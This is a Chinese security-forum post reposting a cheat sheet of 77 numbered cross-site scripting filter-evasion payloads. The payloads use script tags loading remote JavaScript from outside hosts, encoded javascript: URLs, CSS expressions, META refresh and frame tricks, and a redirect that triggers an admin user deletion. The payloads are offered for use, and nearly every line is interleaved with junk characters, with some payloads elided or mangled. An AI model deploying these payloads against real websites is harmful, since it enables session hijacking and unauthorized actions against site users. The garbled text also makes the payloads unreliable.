貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
; v+ M9 v$ y( ~) j7 V v* n(1)普通的XSS JavaScript注入
) f1 ]$ O$ F+ d* D<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* n. T+ _' i2 k+ C$ r1 ^(2)IMG标签XSS使用JavaScript命令8 Q5 C( X# k& f# b6 e, k8 R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> f1 f; Z1 ?0 `3 f- R. T: ?
(3)IMG标签无分号无引号
4 s- @/ a F- ]2 }7 x% e<IMG SRC=javascript:alert(‘XSS’)>+ r: ^" `/ f# c$ X2 a0 o0 o
(4)IMG标签大小写不敏感
+ J6 X1 C9 H# s [5 m<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" V* Y6 J& e3 `1 }
(5)HTML编码(必须有分号) h6 q+ i8 c3 o! p) Y
<IMG SRC=javascript:alert(“XSS”)>8 v; o8 U1 P; [* [) ^/ ]8 y+ D T8 {. n
(6)修正缺陷IMG标签
% g$ x; S ^9 k# b' B; C6 V<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
2 J& h- J3 K" n. N' C, N( w: ]# Q2 |% B" D# E- i
6 U& q8 Y/ N o
(7)formCharCode标签(计算器)8 h x4 G: p. X5 r3 F
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. Z, d0 D4 b1 X3 t( r+ }* L9 E(8)UTF-8的Unicode编码(计算器)6 k5 F1 [* d5 S# b
<IMG SRC=jav..省略..S')>
7 h' \" I) D0 \- h9 y(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; n, h6 [: o6 p% }1 I2 W( H9 e<IMG SRC=jav..省略..S')>
+ {* X. A# \, R" k. Q(10)十六进制编码也是没有分号(计算器)6 F# V& Q' N; E. Y
<IMG SRC=java..省略..XSS')>0 ~: d( c3 c$ H9 {. E, r
(11)嵌入式标签,将Javascript分开9 n8 A" e$ l. K/ z" ^7 h5 K
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 ~. w+ W) K; ]' y' n( m: {3 O
(12)嵌入式编码标签,将Javascript分开! P+ \7 n2 g1 y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- O, Z8 Z0 y7 n5 j1 h! d(13)嵌入式换行符
3 x7 C" A, z$ c9 m* a% _* p<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ w8 g F* \% i0 @(14)嵌入式回车
) i: M3 p; a) N/ I" c3 h' L |& p% ~<IMG SRC=”jav ascript:alert(‘XSS’);”>7 N4 u! {* G# l4 D
(15)嵌入式多行注入JavaScript,这是XSS极端的例子7 \7 h0 h; i9 J# f
<IMG SRC=”javascript:alert(‘XSS‘)”>4 i. ?8 M5 z" z
(16)解决限制字符(要求同页面)9 g1 @; i$ Y4 I4 X8 e% O
<script>z=’document.’</script>
% Y: t; R/ {3 C. m<script>z=z+’write(“‘</script>2 w. E! v8 V" t+ J9 L4 O/ ]
<script>z=z+’<script’</script>& d! H7 D' x) r1 k% O k& B, G h O
<script>z=z+’ src=ht’</script>
3 G( C9 ]5 F2 H" z<script>z=z+’tp://ww’</script>( ~; R/ u; _. j- g% i+ B' n
<script>z=z+’w.shell’</script>
9 b2 r1 u* N, d8 V1 [<script>z=z+’.net/1.’</script>3 o! w6 U4 D8 t4 d
<script>z=z+’js></sc’</script>
3 }( }0 ^& y2 [* F2 }5 L: O& U<script>z=z+’ript>”)’</script>
" U7 k' y5 |( V8 L5 T# G<script>eval_r(z)</script>* ?: Q2 {( l2 R; q9 m% F
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
" n- |0 Q( t5 W: [& T, b9 Mhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
0 _; {1 {: R8 w3 Gperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 ?0 u9 l7 K# g7 U2 O# l(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 e g$ X* v5 l: }; Z H
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out1 R0 b6 h) N! |- v r( V1 M) g
(19)Spaces和meta前的IMG标签
5 R5 I7 X5 c- ?2 V: t' E<IMG SRC=” javascript:alert(‘XSS’);”>6 G4 z1 K V4 ?$ n: x
(20)Non-alpha-non-digit XSS
; c& z" P: J& `; ^; _& a+ G f5 Y<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* t: E- K2 F; t5 A4 R9 C
(21)Non-alpha-non-digit XSS to 2
C6 S6 w6 z; ^1 f2 b: h2 M' x0 o<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>& C. O. m4 A; q2 E% I) E; y
(22)Non-alpha-non-digit XSS to 3
- [1 G" J; Q3 u<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>: i1 x$ g4 o; M1 R# A8 w
(23)双开括号
: S* P t9 `! v: i6 \2 h& t: |6 n<<SCRIPT>alert(“XSS”);//<</SCRIPT>" [- J# P1 ^4 b2 r. E
(24)无结束脚本标记(仅火狐等浏览器)
0 k9 R& i) a& |1 } l* t7 E<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% K/ y+ S- a* ]) m7 f% A4 c& N3 }
(25)无结束脚本标记2
l8 T9 A3 r% N8 Q5 ]; O<SCRIPT SRC=//3w.org/XSS/xss.js>
3 D8 p% [) m" t# d, O(26)半开的HTML/JavaScript XSS
! t* K% E) i+ x# O3 V. \<IMG SRC=”javascript:alert(‘XSS’)”# f" P, }+ U- D& P% F
(27)双开角括号
' B' |2 \, y) g; p- e<iframe src=http://3w.org/XSS.html <9 \" p2 l" o8 l- D- Q
(28)无单引号 双引号 分号- F/ R$ y7 d5 S e) d
<SCRIPT>a=/XSS/# U8 i+ ^7 K4 A {- z
alert(a.source)</SCRIPT>) B) H+ j- C* {6 t$ F
(29)换码过滤的JavaScript7 M) ?* d t1 ]/ [' F
\”;alert(‘XSS’);//
/ U' S; Q; U. c9 c(30)结束Title标签
* v7 r6 U/ Z! O" C% v. j</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>+ }) K% B, S& ^( }+ Z$ I3 W
(31)Input Image5 l8 u( Z$ Z8 O( P7 V
<INPUT SRC=”javascript:alert(‘XSS’);”>7 t- v* e0 E7 D4 ]+ q/ e4 e1 t
(32)BODY Image
. `& l/ x% U- \3 D# ]5 }# g2 c<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
' \# H0 x' l" P, H3 U9 e: U(33)BODY标签
) ? `. ?3 O* w# L2 c Z<BODY(‘XSS’)>
6 t+ |, s$ k e$ j. J9 C(34)IMG Dynsrc
5 }- i: a; A' i) E<IMG DYNSRC=”javascript:alert(‘XSS’)”>
- v/ X, ]' d$ M; I(35)IMG Lowsrc1 ~ C& p% m! I6 ?( k) v* d
<IMG LOWSRC=”javascript:alert(‘XSS’)”>6 P' { k! v7 g- s
(36)BGSOUND
) F0 |2 z& b% `. z! \4 c1 |<BGSOUND SRC=”javascript:alert(‘XSS’);”>6 h7 M: v: ]0 g1 g4 ?
(37)STYLE sheet
- P% C1 S) O! {0 ?5 T" s% a<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>1 h+ ?4 M4 n% d) N
(38)远程样式表
; X- B# h# @( K. ?1 x) u<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, ^5 r7 t4 E8 i" c
(39)List-style-image(列表式)/ |6 o) s3 b6 u! ~% k6 H1 e
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ ?; G1 |8 J' f- T* X! |(40)IMG VBscript
6 `4 _( N v( t1 r) A h- N<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
: H( j& A; ?5 _ `& @(41)META链接url
' p5 C+ j+ A- B+ A/ H2 _- Y7 I Y) R- o! f7 `
4 Z1 \. z- ^7 H E<META HTTP-EQUIV=”refresh” CONTENT=”0;
% F, g/ P X+ W9 Q5 }& s; B0 a3 yURL=http://;URL=javascript:alert(‘XSS’);”>$ V/ d" V2 k! V4 M1 j% l
(42)Iframe
; B% z; o1 W. W9 s: {2 \1 }9 V( ~<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>0 s8 O* a9 I& B n0 u4 v+ @. `
(43)Frame
0 O" ^, r6 Z2 R- T. L$ s<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board, p' k# B7 W) c! |$ B" k
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
9 k# t! w, M5 ^0 b: W% U(44)Table. n) Y5 R0 C+ N1 T# {$ x
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* M g7 D% m7 p( G5 E
(45)TD
3 p+ V! P: J* ]/ V6 j6 ]8 ?<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 U2 N: H, P) c, o( W4 a( C1 Y(46)DIV background-image' u4 D& }1 Z9 s$ q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ B, z# Z: |6 |# K& j1 D, F& \(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-: K3 m, p& r# I8 w" Q" j" K0 r" h
8&13&12288&65279)- Z7 e7 x5 z) d% @3 C# p% _" v' r
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- |5 }4 l2 Q) [+ r$ x
(48)DIV expression0 z6 Y H, a) W( Q& {. j9 H7 c1 R$ k
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>- H6 _5 x$ \7 E. H1 [: r
(49)STYLE属性分拆表达7 F, l: @ _. x, H. I0 [5 K& B' D
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
" l; i9 Z: O' |2 o(50)匿名STYLE(组成:开角号和一个字母开头)
& S( @2 I, r- g6 x3 {2 i<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 Z1 g, S1 d% s. m
(51)STYLE background-image
3 i: V4 s( H$ x+ G<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A$ O7 G9 L: v4 T0 j; H7 r9 w
CLASS=XSS></A>1 r* s1 m! B. D" V
(52)IMG STYLE方式+ Z- N& s1 h. w) v" `0 U/ [' Z
exppression(alert(“XSS”))’>: D2 f5 {0 K: m7 `2 X
(53)STYLE background
, o! |% z+ z. c0 k7 K" K. e<STYLE><STYLE9 O. x( d4 Q: G# [
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: \ B0 B% z. C7 l/ i0 p
(54)BASE7 O. S, a, ?' |6 |
<BASE HREF=”javascript:alert(‘XSS’);//”>, p7 V3 v5 P2 ?! B: R5 w( R
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( [; g2 i8 m7 d<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
$ e* `! D* a; A, _* l/ W& ?# D(56)在flash中使用ActionScrpt可以混进你XSS的代码, n; t3 [7 i( ?1 a" f4 D
a=”get”;
: P1 h% y- w! K. z% B) qb=”URL(\”";! [" a& `" [0 A6 i$ z9 d m5 n
c=”javascript:”;4 [' g" Z, w% H, I
d=”alert(‘XSS’);\”)”;% u' S! l% `' J: b# Z% e
eval_r(a+b+c+d);
' L& U. s6 l( \/ G" M# z0 U- A6 I' P(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上$ }! z9 z) P1 ~' N: [1 O: g9 h5 q7 H
<HTML xmlns:xss>8 G. ~; V1 X( b9 e
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>* V+ c0 w9 O( _' O
<xss:xss>XSS</xss:xss>; }9 s2 G" F# D3 O! Q% M
</HTML>
% r! w1 j+ W s4 O(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. H7 S3 z. E# [7 @* }6 E9 C3 L<SCRIPT SRC=””></SCRIPT>
`" _# G: B: D0 |(59)IMG嵌入式命令,可执行任意命令
& b0 y. ]" g, K0 A2 Q- r<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' _% d \. l. J- A; }, D(60)IMG嵌入式命令(a.jpg在同服务器)
% h* P" E# a% g+ J: M' `Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser: T3 r) y4 h, ~( X. a& Y
(61)绕符号过滤* G! }& H2 w H4 Y! L; d3 }# @
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ ~$ @' T$ i4 n4 g' b( F
(62); h+ F; S& _# z! L8 C5 E! X
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
; U: t B" T5 N! ^(63)% N2 N8 X: L) c2 ], @
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
3 F; ?2 g% `" m+ [(64)# r0 J7 _* @( ~, `; q' \
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
! t4 i, I" d! `, B* l(65)! ~) U8 C9 _& P+ \6 B+ }. w1 n8 [
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>" R) i# X* y+ k* D4 |& m9 U
(66)12-7-1 T00LS - Powered by Discuz! Board8 `0 d3 D2 n2 [* W. j
https://www.t00ls.net/viewthread ... table&tid=15267 4/6' L; h6 X2 W* a( C% F* g: M: O# ~
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>0 i0 z8 V& y$ _* e& t+ W; j
(67)
8 Y4 a8 O" @2 j' S<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
' `/ r7 a" u% k' A</SCRIPT>
& r i; l1 o% p(68)URL绕行
: j; M5 \9 @% K<A HREF=”http://127.0.0.1/”>XSS</A>
( r. M" m& W0 |- }) n: v(69)URL编码
4 q) d8 g2 c' C<A HREF=”http://3w.org”>XSS</A>6 X. L/ y* |! N c3 }; Y8 f
(70)IP十进制
7 `# m6 I! i4 l; n D<A HREF=”http://3232235521″>XSS</A>
. s5 O2 Z& s2 D4 D" m$ e(71)IP十六进制5 `: d7 h* j0 Z* z: n* h: [/ d
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>, m9 q9 e! E3 y( ^: `" ^
(72)IP八进制
- n5 p& _4 x# T, d) h( R<A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 t6 P, K& n$ C! d9 ^ [(73)混合编码% r& P+ q8 @6 I6 f1 r
<A HREF=”h
5 u9 k- d' L% m5 [tt p://6 6.000146.0×7.147/”">XSS</A>
! M- X2 y$ q' O- _: J( A6 l(74)节省[http:]; P ~* m+ n8 f( R# c
<A HREF=”//www.google.com/”>XSS</A>
. `: S0 T C5 ]" D(75)节省[www]
" y. e, _. {# t f<A HREF=”http://google.com/”>XSS</A>
9 a# U% S3 v$ M6 Q3 O0 T! W(76)绝对点绝对DNS
! [/ V+ Q' l Y<A HREF=”http://www.google.com./”>XSS</A>/ Z3 z, n* {4 k! ^
(77)javascript链接
6 m0 ~% j" c% [/ v) Y<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>6 R/ ~2 J' @$ W5 n
9 y/ f" j( w. V* q; T2 s
原文地址:http://fuzzexp.org/u/0day/?p=14' L" j) A" L" S* A" n
: y& T; j% e# w9 ` |
发表于 2013-4-19 19:22:37
收藏
支持
反对